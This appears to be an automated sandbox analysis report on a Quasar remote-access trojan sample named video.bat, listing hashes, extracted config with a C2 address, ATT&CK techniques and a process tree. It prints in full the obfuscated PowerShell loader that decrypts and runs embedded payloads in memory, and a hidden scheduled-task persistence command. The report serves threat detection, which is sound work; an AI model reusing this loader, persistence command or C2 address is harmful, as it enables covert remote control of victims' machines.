quasar | 41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34

General

Target

video.bat
Size

1.8MB
MD5

3e23287bf7024e118f144018b5c6ee51
SHA1

e5c30a22a6b46400520809133e02ab824e6f1d8c
SHA256

41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34
SHA512

bd5644d745e159b56e67a9ff21390e9bfcbadd2b69530697dce6a8728af029c8d4d6712fe64975b8cde5fe574305b2a8c683c3f80602ec66d4f9a036a7e9fd06
SSDEEP

24576:nFqcE/6HOYP8eW5fvoUjBEcHvlstN2DzKlIBzmfvz/LKkROe5WkEsdov9eAvfGiA:nF0YPtAfv3qzym9ov9KJ

Score

10^/10

quasar phantom execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Phantom

C2

even-lemon.gl.at.ply.gg:33587

Mutex

db128a32-6a0f-4592-bc4d-39d508fbe456

Attributes

encryption_key
04017BC2FE671A38FED74363CF7D888C6B8DA217
install_name
$phantom-powershell.exe
log_directory
PHANTOM
reconnect_delay
3000
startup_key
$phantom-powershell
subdirectory
$phantom-phantom2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1984-49-0x00000200D2220000-0x00000200D2544000-memory.dmp	family_quasar

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

27 1984 powershell.exe
29 1984 powershell.exe
31 1984 powershell.exe
58 1984 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2480 powershell.exe
4028 powershell.exe
1984 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings powershell.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4908 PING.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2480 powershell.exe
2480 powershell.exe
4028 powershell.exe
4028 powershell.exe
1984 powershell.exe
1984 powershell.exe
1984 powershell.exe

flow	pid	process
27	1984	powershell.exe
29	1984	powershell.exe
31	1984	powershell.exe
58	1984	powershell.exe

pid	process
2480	powershell.exe
4028	powershell.exe
1984	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	powershell.exe

pid	process
4908	PING.EXE

pid	process
2480	powershell.exe
2480	powershell.exe
4028	powershell.exe
4028	powershell.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe
Token: SeBackupPrivilege	4028	powershell.exe
Token: SeRestorePrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeSystemEnvironmentPrivilege	4028	powershell.exe
Token: SeRemoteShutdownPrivilege	4028	powershell.exe
Token: SeUndockPrivilege	4028	powershell.exe
Token: SeManageVolumePrivilege	4028	powershell.exe
Token: 33	4028	powershell.exe
Token: 34	4028	powershell.exe
Token: 35	4028	powershell.exe
Token: 36	4028	powershell.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe
Token: SeBackupPrivilege	4028	powershell.exe
Token: SeRestorePrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeSystemEnvironmentPrivilege	4028	powershell.exe
Token: SeRemoteShutdownPrivilege	4028	powershell.exe
Token: SeUndockPrivilege	4028	powershell.exe
Token: SeManageVolumePrivilege	4028	powershell.exe
Token: 33	4028	powershell.exe
Token: 34	4028	powershell.exe
Token: 35	4028	powershell.exe
Token: 36	4028	powershell.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe
Token: SeBackupPrivilege	4028	powershell.exe
Token: SeRestorePrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeSystemEnvironmentPrivilege	4028	powershell.exe
Token: SeRemoteShutdownPrivilege	4028	powershell.exe
Token: SeUndockPrivilege	4028	powershell.exe
Token: SeManageVolumePrivilege	4028	powershell.exe
Token: 33	4028	powershell.exe
Token: 34	4028	powershell.exe
Token: 35	4028	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

1984 powershell.exe

pid	process
1984	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 912 wrote to memory of 2480	912	cmd.exe	powershell.exe
PID 912 wrote to memory of 2480	912	cmd.exe	powershell.exe
PID 2480 wrote to memory of 4028	2480	powershell.exe	powershell.exe
PID 2480 wrote to memory of 4028	2480	powershell.exe	powershell.exe
PID 2480 wrote to memory of 4312	2480	powershell.exe	WScript.exe
PID 2480 wrote to memory of 4312	2480	powershell.exe	WScript.exe
PID 4312 wrote to memory of 4084	4312	WScript.exe	cmd.exe
PID 4312 wrote to memory of 4084	4312	WScript.exe	cmd.exe
PID 4084 wrote to memory of 1984	4084	cmd.exe	powershell.exe
PID 4084 wrote to memory of 1984	4084	cmd.exe	powershell.exe
PID 1984 wrote to memory of 1988	1984	powershell.exe	cmd.exe
PID 1984 wrote to memory of 1988	1984	powershell.exe	cmd.exe
PID 1988 wrote to memory of 628	1988	cmd.exe	chcp.com
PID 1988 wrote to memory of 628	1988	cmd.exe	chcp.com
PID 1988 wrote to memory of 4908	1988	cmd.exe	PING.EXE
PID 1988 wrote to memory of 4908	1988	cmd.exe	PING.EXE

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\video.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gX7XYLn4dbQdiIUvmYqk2d03PgJBXfcZvi3WFTZZa4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KcZLFz/4shTUK5TFlUW+3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fzajp=New-Object System.IO.MemoryStream(,$param_var); $FzQYM=New-Object System.IO.MemoryStream; $HukBb=New-Object System.IO.Compression.GZipStream($fzajp, [IO.Compression.CompressionMode]::Decompress); $HukBb.CopyTo($FzQYM); $HukBb.Dispose(); $fzajp.Dispose(); $FzQYM.Dispose(); $FzQYM.ToArray();}function execute_function($param_var,$param2_var){ $iMwpu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iFQms=$iMwpu.EntryPoint; $iFQms.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\video.bat';$pGsGT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\video.bat').Split([Environment]::NewLine);foreach ($yaYpE in $pGsGT) { if ($yaYpE.StartsWith(':: ')) { $glRAZ=$yaYpE.Substring(3); break; }}$payloads_var=[string[]]$glRAZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_901_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_901.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_901.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_901.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gX7XYLn4dbQdiIUvmYqk2d03PgJBXfcZvi3WFTZZa4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KcZLFz/4shTUK5TFlUW+3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fzajp=New-Object System.IO.MemoryStream(,$param_var); $FzQYM=New-Object System.IO.MemoryStream; $HukBb=New-Object System.IO.Compression.GZipStream($fzajp, [IO.Compression.CompressionMode]::Decompress); $HukBb.CopyTo($FzQYM); $HukBb.Dispose(); $fzajp.Dispose(); $FzQYM.Dispose(); $FzQYM.ToArray();}function execute_function($param_var,$param2_var){ $iMwpu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iFQms=$iMwpu.EntryPoint; $iFQms.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_901.bat';$pGsGT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_901.bat').Split([Environment]::NewLine);foreach ($yaYpE in $pGsGT) { if ($yaYpE.StartsWith(':: ')) { $glRAZ=$yaYpE.Substring(3); break; }}$payloads_var=[string[]]$glRAZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8vRzJ4lNZilg.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:628

C:\Windows\system32\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:4908

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8vRzJ4lNZilg.bat
Filesize
220B

MD5
259d6378da0d346a51faaa35db750387

SHA1
081fc123f2413d31bca492b409f9b65722052121

SHA256
2002d9c464be0c688086cd4db3079fb68e4a55881d4176dbffc55a104a6dbcdf

SHA512
23daf28e68c315a6cbce8a4f752647ff2ab747878d88c1d513504c88f7a1039c11c001cd848ecbf39c67b300300bebaba082a75789d4f0027e4a09cdc94700ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wni1bjgg.r5y.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_901.bat
Filesize
1.8MB

MD5
3e23287bf7024e118f144018b5c6ee51

SHA1
e5c30a22a6b46400520809133e02ab824e6f1d8c

SHA256
41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34

SHA512
bd5644d745e159b56e67a9ff21390e9bfcbadd2b69530697dce6a8728af029c8d4d6712fe64975b8cde5fe574305b2a8c683c3f80602ec66d4f9a036a7e9fd06

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_901.vbs
Filesize
115B

MD5
81c4ae07dea61c76492cb2b8d1257ec0

SHA1
da26d94a81735088e17e058e1e87c6006d3b7b65

SHA256
f370a3994c7d5e18929c28d669a1b105dee7b3a5c01ecce7899c742a71164640

SHA512
2af5fedaae09b581cb5c16b72a08e1fb927232d450e618d0f6af5a78f1b22e2c47516199918454e722fa8a9aa3b740d6c23d39d76912ef791f19f5c422acae4a

Download Submit
memory/1984-56-0x00000200D2C20000-0x00000200D2C32000-memory.dmp

Filesize
72KB

Download
memory/1984-57-0x00000200D2C80000-0x00000200D2CBC000-memory.dmp

Filesize
240KB

Download
memory/1984-53-0x00000200D31E0000-0x00000200D33A2000-memory.dmp

Filesize
1.8MB

Download
memory/1984-51-0x00000200D2E40000-0x00000200D2E90000-memory.dmp

Filesize
320KB

Download
memory/1984-52-0x00000200D2F50000-0x00000200D3002000-memory.dmp

Filesize
712KB

Download
memory/1984-49-0x00000200D2220000-0x00000200D2544000-memory.dmp

Filesize
3.1MB

Download
memory/2480-13-0x0000022698450000-0x0000022698458000-memory.dmp

Filesize
32KB

Download
memory/2480-50-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download
memory/2480-14-0x0000022698520000-0x0000022698678000-memory.dmp

Filesize
1.3MB

Download
memory/2480-0-0x00007FFF8C453000-0x00007FFF8C455000-memory.dmp

Filesize
8KB

Download
memory/2480-12-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download
memory/2480-11-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download
memory/2480-6-0x00000226FDB70000-0x00000226FDB92000-memory.dmp

Filesize
136KB

Download
memory/4028-30-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download
memory/4028-27-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download
memory/4028-26-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download
memory/4028-25-0x00007FFF8C450000-0x00007FFF8CF11000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads